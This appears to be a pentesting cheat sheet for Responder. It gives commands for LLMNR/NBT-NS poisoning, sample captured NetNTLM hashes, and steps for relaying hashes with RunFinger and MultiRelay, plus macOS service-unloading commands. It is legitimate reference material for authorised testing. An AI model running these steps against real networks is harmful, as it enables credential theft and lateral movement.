Responder#
Responder is an LLMNR, NBT-NS, and mDNS poisoner. It answers specific NBT-NS queries on the network based on their name suffix. The operator runs it on internal engagements to collect NetNTLM hashes or relay them onward.
Listen#
Responder listens on UDP 53, 137, 138, 389, 1434 and TCP 21, 25, 80, 110, 139, 389, 445, 587, 1433, 3128, 3141, and multicast UDP 5553.
$ python Responder.py -I <interface>
Configuration lives in Responder.conf.
Hashes#
NTLMv1 SSP enabled.
hashcat::admin-5AA37877:85D5BC2CE95161CD000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
NTLMv1 no-SSP.
hashcat::admin-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
NTLMv2.
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c783031000000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
Targeting#
Target a specific IP range, edit Responder.conf and set
RespondTo to a range (10.X.X.1-10) or single host
(10.X.X.2).
Target a specific NBT-NS / LLMNR name, set RespondToName to a
spoofed hostname (SQLSERVER-01, FILESHARE02).
Use analyze mode (-A) to gauge how noisy the IP space is.
$ python Responder.py -I <interface> -A
Multi-relay#
Use Responder plus MultiRelay to forward captured hashes onward.
Disable HTTP and SMB servers by editing
Responder.conf.RunFinger.pychecks if a host has SMB Signing False.$ python RunFinger.py -i 10.X.X.0/24
SMB Signing being disabled is required; otherwise the target is not vulnerable.
Start Responder.
$ python Responder.py -I <interface>
Start MultiRelay to route captured hashes to the target. The
-utarget user must be a local admin on that host.$ python MultiRelay.py -t <Target IP> -u ALL
macOS#
macOS Responder must start with an IP for -i (no native support
for interface binding). Unload conflicting services first.
# launchctl unload Kerberos, mDNSResponder, smbd, netbiosd plists
$ launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist
$ launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
$ launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist
$ launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist